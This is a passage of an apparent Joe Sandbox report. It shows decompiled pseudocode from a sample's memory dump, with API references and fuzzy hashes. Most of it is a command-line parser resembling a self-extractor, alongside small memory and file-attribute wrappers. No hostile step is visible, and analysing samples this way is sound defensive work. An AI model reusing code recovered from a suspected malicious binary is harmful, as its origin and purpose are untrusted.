                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0x10d8d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x010d4b66
                                                                                                                                                                                                                                            0x010d4b74
                                                                                                                                                                                                                                            0x010d4b98
                                                                                                                                                                                                                                            0x010d4ba0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4bac
                                                                                                                                                                                                                                            0x010d4ba4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4ba4
                                                                                                                                                                                                                                            0x010d4b78
                                                                                                                                                                                                                                            0x010d4b7e
                                                                                                                                                                                                                                            0x010d4b84
                                                                                                                                                                                                                                            0x010d4b8a
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010D4FA1,00000000), ref: 010D4B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: cd3d7e76d0ade06e8d3a550454395e3dad67e9ac289d66bba582a53519790310
                                                                                                                                                                                                                                            • Instruction ID: b0fe64ab250fa23c39f6da9dff6b6d31aba52bda05a48e9edf4b2ef231a3a3ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3d7e76d0ade06e8d3a550454395e3dad67e9ac289d66bba582a53519790310
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF01231500B0DAE4771AE2ACC0269ABFE6EBA5270310892FD5EED21E0E7706441CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x010d66b1
                                                                                                                                                                                                                                            0x010d66ba
                                                                                                                                                                                                                                            0x010d66c7
                                                                                                                                                                                                                                            0x010d66bc
                                                                                                                                                                                                                                            0x010d66be
                                                                                                                                                                                                                                            0x010d66be

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,010D4777,?,010D4E38,?), ref: 010D66B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: aa4709a03f615259f08adce981b9396b2dd94d46959f4c277090e7fa15368d44
                                                                                                                                                                                                                                            • Instruction ID: fab4fcb6f9cfebaaf7e17f2a236394ac8244f2f1f638011668b12a9a98944191
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa4709a03f615259f08adce981b9396b2dd94d46959f4c277090e7fa15368d44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BB09276222540826A61063968295562881A6C123A7E45B90F072C11D4CA3FD446D104
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x010d4caa
                                                                                                                                                                                                                                            0x010d4cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 010D4CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 556f359041c4e409505310e875d9671b0c2e99390f8ed9999bfdcb1ad186310e
                                                                                                                                                                                                                                            • Instruction ID: 4697e91657c81aca3bf524f38987453eb2c7b178e18ce4404c03a84c3242081b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 556f359041c4e409505310e875d9671b0c2e99390f8ed9999bfdcb1ad186310e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1B0123214420CF7CF102ED2E809F853F1DEBC4761F144000FA0C46040CA7794108795
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x010d4cc8
                                                                                                                                                                                                                                            0x010d4ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: 449256702cc765ebfd780baa81ba342a7179df683086c909eee808a97aac1d84
                                                                                                                                                                                                                                            • Instruction ID: 3d4be067431c3b0bc94925d09708c8db4e76196c33f8ff34e5f860a1fc8f6827
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 449256702cc765ebfd780baa81ba342a7179df683086c909eee808a97aac1d84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84B0123100010CF78F102A52E8088453F1DD6C43607000010F90C42011CB3B98118684
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E010D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E010D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E010D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E010D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E010D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x521, 0x10d1140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0x10d8588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E010D667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E010D667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E010D5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E010D1680(0x10d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E010D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E010D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0x10d8a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E010D5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0x10d8b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0x10d8a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E010D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E010D658A(_t218, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            																if(E010D31E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0x10d8a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0x10d8a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0x10d8a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0x10d8a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0x10d8a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0x10d9a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
